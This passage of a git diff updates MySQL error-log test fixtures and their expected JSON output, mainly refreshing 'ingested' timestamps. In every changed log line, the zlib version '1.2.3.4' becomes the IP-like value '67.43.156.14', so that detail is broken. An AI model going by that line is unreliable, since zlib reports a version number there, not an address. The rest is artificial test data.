optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188600186Z", + "ingested": "2021-12-09T13:41:33.115307800Z", "category": [ "database" ], @@ -2937,7 +2937,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 228658ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188600642Z", + "ingested": "2021-12-09T13:41:33.115313100Z", "category": [ "database" ], @@ -2958,7 +2958,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 257407ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188601103Z", + "ingested": "2021-12-09T13:41:33.115318100Z", "category": [ "database" ], @@ -2979,7 +2979,7 @@ }, "message": "InnoDB: page_cleaner: 1000ms intended loop took 3598669ms. The settings might not be optimal. (flushed=0 and evicted=0, during the time.)", "event": { - "ingested": "2021-06-21T12:35:17.188601642Z", + "ingested": "2021-12-09T13:41:33.115355700Z", "category": [ "database" ], @@ -2994,7 +2994,7 @@ "@timestamp": "2016-12-12T12:40:38.000Z", "message": "mysqld_safe Starting mysqld daemon with databases from /usr/local/var/mysql", "event": { - "ingested": "2021-06-21T12:35:17.188602325Z", + "ingested": "2021-12-09T13:41:33.115359200Z", "category": [ "database" ], @@ -3015,7 +3015,7 @@ }, "message": "TIMESTAMP with implicit DEFAULT value is deprecated. Please use --explicit_defaults_for_timestamp server option (see documentation for more details).", "event": { - "ingested": "2021-06-21T12:35:17.188602803Z", + "ingested": "2021-12-09T13:41:33.115363Z", "category": [ "database" ], @@ -3036,7 +3036,7 @@ }, "message": "'NO_ZERO_DATE', 'NO_ZERO_IN_DATE' and 'ERROR_FOR_DIVISION_BY_ZERO' sql modes should be used with strict mode. They will be merged with strict mode in a future release.", "event": { - "ingested": "2021-06-21T12:35:17.188603268Z", + "ingested": "2021-12-09T13:41:33.115367700Z", "category": [ "database" ], @@ -3057,7 +3057,7 @@ }, "message": "'NO_AUTO_CREATE_USER' sql mode was not set.", "event": { - "ingested": "2021-06-21T12:35:17.188603721Z", + "ingested": "2021-12-09T13:41:33.115373600Z", "category": [ "database" ], @@ -3078,7 +3078,7 @@ }, "message": "Insecure configuration for --secure-file-priv: Current value does not restrict location of generated files. Consider setting it to a valid, non-empty path.", "event": { - "ingested": "2021-06-21T12:35:17.188604178Z", + "ingested": "2021-12-09T13:41:33.115381500Z", "category": [ "database" ], @@ -3099,7 +3099,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld (mysqld 5.7.10) starting as process 97910 ...", "event": { - "ingested": "2021-06-21T12:35:17.188604635Z", + "ingested": "2021-12-09T13:41:33.115387300Z", "category": [ "database" ], @@ -3120,7 +3120,7 @@ }, "message": "Setting lower_case_table_names=2 because file system for /usr/local/var/mysql/ is case insensitive", "event": { - "ingested": "2021-06-21T12:35:17.188605103Z", + "ingested": "2021-12-09T13:41:33.115390900Z", "category": [ "database" ], @@ -3141,7 +3141,7 @@ }, "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:17.188605560Z", + "ingested": "2021-12-09T13:41:33.115395300Z", "category": [ "database" ], @@ -3162,7 +3162,7 @@ }, "message": "InnoDB: Uses event mutexes", "event": { - "ingested": "2021-06-21T12:35:17.188606013Z", + "ingested": "2021-12-09T13:41:33.115401100Z", "category": [ "database" ], @@ -3183,7 +3183,7 @@ }, "message": "InnoDB: GCC builtin __atomic_thread_fence() is used for memory barrier", "event": { - "ingested": "2021-06-21T12:35:17.188606469Z", + "ingested": "2021-12-09T13:41:33.115407Z", "category": [ "database" ], @@ -3204,7 +3204,7 @@ }, "message": "InnoDB: Compressed tables use zlib 1.2.3", "event": { - "ingested": "2021-06-21T12:35:17.188606925Z", + "ingested": "2021-12-09T13:41:33.115412900Z", "category": [ "database" ], @@ -3225,7 +3225,7 @@ }, "message": "InnoDB: Number of pools: 1", "event": { - "ingested": "2021-06-21T12:35:17.188607376Z", + "ingested": "2021-12-09T13:41:33.115417500Z", "category": [ "database" ], @@ -3246,7 +3246,7 @@ }, "message": "InnoDB: Using CPU crc32 instructions", "event": { - "ingested": "2021-06-21T12:35:17.188607831Z", + "ingested": "2021-12-09T13:41:33.115422300Z", "category": [ "database" ], @@ -3267,7 +3267,7 @@ }, "message": "InnoDB: Initializing buffer pool, total size = 128M, instances = 1, chunk size = 128M", "event": { - "ingested": "2021-06-21T12:35:17.188608367Z", + "ingested": "2021-12-09T13:41:33.115428200Z", "category": [ "database" ], @@ -3288,7 +3288,7 @@ }, "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:17.188608822Z", + "ingested": "2021-12-09T13:41:33.115434Z", "category": [ "database" ], @@ -3309,7 +3309,7 @@ }, "message": "InnoDB: Highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:17.188609278Z", + "ingested": "2021-12-09T13:41:33.115440100Z", "category": [ "database" ], @@ -3330,7 +3330,7 @@ }, "message": "InnoDB: Log scan progressed past the checkpoint lsn 2498891", "event": { - "ingested": "2021-06-21T12:35:17.188609738Z", + "ingested": "2021-12-09T13:41:33.115444500Z", "category": [ "database" ], @@ -3351,7 +3351,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188610189Z", + "ingested": "2021-12-09T13:41:33.115448900Z", "category": [ "database" ], @@ -3372,7 +3372,7 @@ }, "message": "InnoDB: Doing recovery: scanned up to log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188612418Z", + "ingested": "2021-12-09T13:41:33.115453200Z", "category": [ "database" ], @@ -3393,7 +3393,7 @@ }, "message": "InnoDB: Database was not shutdown normally!", "event": { - "ingested": "2021-06-21T12:35:17.188612978Z", + "ingested": "2021-12-09T13:41:33.115457700Z", "category": [ "database" ], @@ -3414,7 +3414,7 @@ }, "message": "InnoDB: Starting crash recovery.", "event": { - "ingested": "2021-06-21T12:35:17.188613492Z", + "ingested": "2021-12-09T13:41:33.115480300Z", "category": [ "database" ], @@ -3435,7 +3435,7 @@ }, "message": "InnoDB: Removed temporary tablespace data file: \"ibtmp1\"", "event": { - "ingested": "2021-06-21T12:35:17.188614109Z", + "ingested": "2021-12-09T13:41:33.115485500Z", "category": [ "database" ], @@ -3456,7 +3456,7 @@ }, "message": "InnoDB: Creating shared tablespace for temporary tables", "event": { - "ingested": "2021-06-21T12:35:17.188614562Z", + "ingested": "2021-12-09T13:41:33.115490800Z", "category": [ "database" ], @@ -3477,7 +3477,7 @@ }, "message": "InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...", "event": { - "ingested": "2021-06-21T12:35:17.188615028Z", + "ingested": "2021-12-09T13:41:33.115495400Z", "category": [ "database" ], @@ -3498,7 +3498,7 @@ }, "message": "InnoDB: File './ibtmp1' size is now 12 MB.", "event": { - "ingested": "2021-06-21T12:35:17.188615483Z", + "ingested": "2021-12-09T13:41:33.115500300Z", "category": [ "database" ], @@ -3519,7 +3519,7 @@ }, "message": "InnoDB: 96 redo rollback segment(s) found. 96 redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188615981Z", + "ingested": "2021-12-09T13:41:33.115505Z", "category": [ "database" ], @@ -3540,7 +3540,7 @@ }, "message": "InnoDB: 32 non-redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188616514Z", + "ingested": "2021-12-09T13:41:33.115510200Z", "category": [ "database" ], @@ -3561,7 +3561,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.188616971Z", + "ingested": "2021-12-09T13:41:33.115514500Z", "category": [ "database" ], @@ -3582,7 +3582,7 @@ }, "message": "InnoDB: 5.7.10 started; log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188617428Z", + "ingested": "2021-12-09T13:41:33.115519400Z", "category": [ "database" ], @@ -3603,7 +3603,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /usr/local/var/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.188617880Z", + "ingested": "2021-12-09T13:41:33.115525400Z", "category": [ "database" ], @@ -3624,7 +3624,7 @@ }, "message": "InnoDB: not started", "event": { - "ingested": "2021-06-21T12:35:17.188618341Z", + "ingested": "2021-12-09T13:41:33.115531400Z", "category": [ "database" ], @@ -3645,7 +3645,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.188618800Z", + "ingested": "2021-12-09T13:41:33.115537300Z", "category": [ "database" ], @@ -3666,7 +3666,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 161212 12:40:39", "event": { - "ingested": "2021-06-21T12:35:17.188619249Z", + "ingested": "2021-12-09T13:41:33.115543100Z", "category": [ "database" ], @@ -3687,7 +3687,7 @@ }, "message": "Found ca.pem, server-cert.pem and server-key.pem in data directory. Trying to enable SSL support using them.", "event": { - "ingested": "2021-06-21T12:35:17.188619715Z", + "ingested": "2021-12-09T13:41:33.115548900Z", "category": [ "database" ], @@ -3708,7 +3708,7 @@ }, "message": "Skipping generation of SSL certificates as certificate files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188620170Z", + "ingested": "2021-12-09T13:41:33.115554700Z", "category": [ "database" ], @@ -3729,7 +3729,7 @@ }, "message": "CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:17.188620627Z", + "ingested": "2021-12-09T13:41:33.115560700Z", "category": [ "database" ], @@ -3750,7 +3750,7 @@ }, "message": "Skipping generation of RSA key pair as key files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188621084Z", + "ingested": "2021-12-09T13:41:33.115566600Z", "category": [ "database" ], @@ -3771,7 +3771,7 @@ }, "message": "Server hostname (bind-address): '*'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:17.188621539Z", + "ingested": "2021-12-09T13:41:33.115572400Z", "category": [ "database" ], @@ -3792,7 +3792,7 @@ }, "message": "IPv6 is available.", "event": { - "ingested": "2021-06-21T12:35:17.188621995Z", + "ingested": "2021-12-09T13:41:33.115578300Z", "category": [ "database" ], @@ -3813,7 +3813,7 @@ }, "message": "- '::' resolves to '::';", "event": { - "ingested": "2021-06-21T12:35:17.188622447Z", + "ingested": "2021-12-09T13:41:33.115584100Z", "category": [ "database" ], @@ -3834,7 +3834,7 @@ }, "message": "Server socket created on IP: '::'.", "event": { - "ingested": "2021-06-21T12:35:17.188622899Z", + "ingested": "2021-12-09T13:41:33.115590Z", "category": [ "database" ], @@ -3855,7 +3855,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:17.188623380Z", + "ingested": "2021-12-09T13:41:33.115595900Z", "category": [ "database" ], @@ -3876,7 +3876,7 @@ }, "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:17.188623835Z", + "ingested": "2021-12-09T13:41:33.115601800Z", "category": [ "database" ], @@ -3890,7 +3890,7 @@ { "message": "Version: '5.7.10' socket: '/tmp/mysql.sock' port: 3306 Homebrew", "event": { - "ingested": "2021-06-21T12:35:17.188624289Z", + "ingested": "2021-12-09T13:41:33.115607600Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log index 31aa8efdf71..8635d2a581e 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log @@ -2,7 +2,7 @@ 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:50 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:50 InnoDB: Completed initialization of buffer pool InnoDB: The first specified data file ./ibdata1 did not exist: @@ -28,7 +28,7 @@ InnoDB: Foreign key constraint system tables created 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:52 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:52 InnoDB: Completed initialization of buffer pool 161209 14:18:52 InnoDB: highest supported file format is Barracuda. @@ -45,7 +45,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:53 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:53 InnoDB: Completed initialization of buffer pool 161209 14:18:53 InnoDB: highest supported file format is Barracuda. @@ -62,7 +62,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:56 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:56 InnoDB: Completed initialization of buffer pool 161209 14:18:57 InnoDB: highest supported file format is Barracuda. @@ -85,7 +85,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled. 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:37:57 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:37:57 InnoDB: Completed initialization of buffer pool 161209 14:37:57 InnoDB: highest supported file format is Barracuda. @@ -101,7 +101,7 @@ Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' p 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:50 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:50 InnoDB: Completed initialization of buffer pool InnoDB: The first specified data file ./ibdata1 did not exist: @@ -127,7 +127,7 @@ InnoDB: Foreign key constraint system tables created 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:52 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:52 InnoDB: Completed initialization of buffer pool 161209 14:18:52 InnoDB: highest supported file format is Barracuda. @@ -144,7 +144,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:53 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:53 InnoDB: Completed initialization of buffer pool 161209 14:18:53 InnoDB: highest supported file format is Barracuda. @@ -156,7 +156,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp 161209 14:18:55 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:55 InnoDB: The InnoDB memory heap is disabled 161209 14:18:55 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:55 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:55 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:55 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:55 InnoDB: Completed initialization of buffer pool 161209 14:18:55 InnoDB: highest supported file format is Barracuda. @@ -173,7 +173,7 @@ ERROR: 1050 Table 'plugin' already exists 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled. 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:18:56 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:18:56 InnoDB: Completed initialization of buffer pool 161209 14:18:57 InnoDB: highest supported file format is Barracuda. @@ -196,7 +196,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled. 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins -161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4 +161209 14:37:57 InnoDB: Compressed tables use zlib 67.43.156.14 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M 161209 14:37:57 InnoDB: Completed initialization of buffer pool 161209 14:37:57 InnoDB: highest supported file format is Barracuda. diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json index ba7b9129ef8..78913810041 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json @@ -7,7 +7,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730829324Z", + "ingested": "2021-12-09T13:41:34.472394Z", "category": [ "database" ], @@ -25,7 +25,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730835428Z", + "ingested": "2021-12-09T13:41:34.472404500Z", "category": [ "database" ], @@ -40,7 +40,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730836609Z", + "ingested": "2021-12-09T13:41:34.472411300Z", "category": [ "database" ], @@ -55,7 +55,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730837916Z", + "ingested": "2021-12-09T13:41:34.472418Z", "category": [ "database" ], @@ -68,9 +68,9 @@ }, { "@timestamp": "2016-12-09T14:18:50.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730838969Z", + "ingested": "2021-12-09T13:41:34.472424400Z", "category": [ "database" ], @@ -85,7 +85,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730840306Z", + "ingested": "2021-12-09T13:41:34.472430800Z", "category": [ "database" ], @@ -100,7 +100,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730841999Z", + "ingested": "2021-12-09T13:41:34.472437100Z", "category": [ "database" ], @@ -114,7 +114,7 @@ { "message": "InnoDB: The first specified data file ./ibdata1 did not exist:", "event": { - "ingested": "2021-06-21T12:35:18.730843159Z", + "ingested": "2021-12-09T13:41:34.472459400Z", "category": [ "database" ], @@ -128,7 +128,7 @@ { "message": "InnoDB: a new database to be created!", "event": { - "ingested": "2021-06-21T12:35:18.730844474Z", + "ingested": "2021-12-09T13:41:34.472472500Z", "category": [ "database" ], @@ -143,7 +143,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Setting file ./ibdata1 size to 10 MB", "event": { - "ingested": "2021-06-21T12:35:18.730845624Z", + "ingested": "2021-12-09T13:41:34.472481600Z", "category": [ "database" ], @@ -157,7 +157,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730847185Z", + "ingested": "2021-12-09T13:41:34.472488Z", "category": [ "database" ], @@ -172,7 +172,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730848732Z", + "ingested": "2021-12-09T13:41:34.472520600Z", "category": [ "database" ], @@ -186,7 +186,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile0 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730849944Z", + "ingested": "2021-12-09T13:41:34.472528500Z", "category": [ "database" ], @@ -200,7 +200,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730851081Z", + "ingested": "2021-12-09T13:41:34.472539100Z", "category": [ "database" ], @@ -215,7 +215,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730852483Z", + "ingested": "2021-12-09T13:41:34.472544200Z", "category": [ "database" ], @@ -229,7 +229,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile1 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730853590Z", + "ingested": "2021-12-09T13:41:34.472558400Z", "category": [ "database" ], @@ -243,7 +243,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730855094Z", + "ingested": "2021-12-09T13:41:34.472592900Z", "category": [ "database" ], @@ -257,7 +257,7 @@ { "message": "InnoDB: Doublewrite buffer not found: creating new", "event": { - "ingested": "2021-06-21T12:35:18.730856170Z", + "ingested": "2021-12-09T13:41:34.472640800Z", "category": [ "database" ], @@ -271,7 +271,7 @@ { "message": "InnoDB: Doublewrite buffer created", "event": { - "ingested": "2021-06-21T12:35:18.730857870Z", + "ingested": "2021-12-09T13:41:34.472663700Z", "category": [ "database" ], @@ -285,7 +285,7 @@ { "message": "InnoDB: 127 rollback segment(s) active.", "event": { - "ingested": "2021-06-21T12:35:18.730858956Z", + "ingested": "2021-12-09T13:41:34.472673700Z", "category": [ "database" ], @@ -299,7 +299,7 @@ { "message": "InnoDB: Creating foreign key constraint system tables", "event": { - "ingested": "2021-06-21T12:35:18.730860379Z", + "ingested": "2021-12-09T13:41:34.472680500Z", "category": [ "database" ], @@ -313,7 +313,7 @@ { "message": "InnoDB: Foreign key constraint system tables created", "event": { - "ingested": "2021-06-21T12:35:18.730861688Z", + "ingested": "2021-12-09T13:41:34.472688300Z", "category": [ "database" ], @@ -328,7 +328,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730862971Z", + "ingested": "2021-12-09T13:41:34.472696400Z", "category": [ "database" ], @@ -343,7 +343,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 0", "event": { - "ingested": "2021-06-21T12:35:18.730864528Z", + "ingested": "2021-12-09T13:41:34.472719400Z", "category": [ "database" ], @@ -358,7 +358,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730865827Z", + "ingested": "2021-12-09T13:41:34.472732500Z", "category": [ "database" ], @@ -373,7 +373,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730866983Z", + "ingested": "2021-12-09T13:41:34.472739800Z", "category": [ "database" ], @@ -391,7 +391,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730868049Z", + "ingested": "2021-12-09T13:41:34.472747100Z", "category": [ "database" ], @@ -409,7 +409,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730869358Z", + "ingested": "2021-12-09T13:41:34.472753400Z", "category": [ "database" ], @@ -424,7 +424,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730870512Z", + "ingested": "2021-12-09T13:41:34.472758900Z", "category": [ "database" ], @@ -439,7 +439,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730871930Z", + "ingested": "2021-12-09T13:41:34.472764500Z", "category": [ "database" ], @@ -452,9 +452,9 @@ }, { "@timestamp": "2016-12-09T14:18:52.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730872991Z", + "ingested": "2021-12-09T13:41:34.472769100Z", "category": [ "database" ], @@ -469,7 +469,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730874437Z", + "ingested": "2021-12-09T13:41:34.472774600Z", "category": [ "database" ], @@ -484,7 +484,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730875645Z", + "ingested": "2021-12-09T13:41:34.472781Z", "category": [ "database" ], @@ -499,7 +499,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730876736Z", + "ingested": "2021-12-09T13:41:34.472788500Z", "category": [ "database" ], @@ -514,7 +514,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730878252Z", + "ingested": "2021-12-09T13:41:34.472794800Z", "category": [ "database" ], @@ -529,7 +529,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730879465Z", + "ingested": "2021-12-09T13:41:34.472801500Z", "category": [ "database" ], @@ -543,7 +543,7 @@ { "message": "ERROR: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1", "event": { - "ingested": "2021-06-21T12:35:18.730880830Z", + "ingested": "2021-12-09T13:41:34.472807900Z", "category": [ "database" ], @@ -561,7 +561,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.730882003Z", + "ingested": "2021-12-09T13:41:34.472814300Z", "category": [ "database" ], @@ -576,7 +576,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730883613Z", + "ingested": "2021-12-09T13:41:34.472819800Z", "category": [ "database" ], @@ -591,7 +591,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730884940Z", + "ingested": "2021-12-09T13:41:34.472826100Z", "category": [ "database" ], @@ -606,7 +606,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730886043Z", + "ingested": "2021-12-09T13:41:34.472832400Z", "category": [ "database" ], @@ -624,7 +624,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.730887331Z", + "ingested": "2021-12-09T13:41:34.472839100Z", "category": [ "database" ], @@ -638,7 +638,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730888460Z", + "ingested": "2021-12-09T13:41:34.472845400Z", "category": [ "database" ], @@ -656,7 +656,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730889528Z", + "ingested": 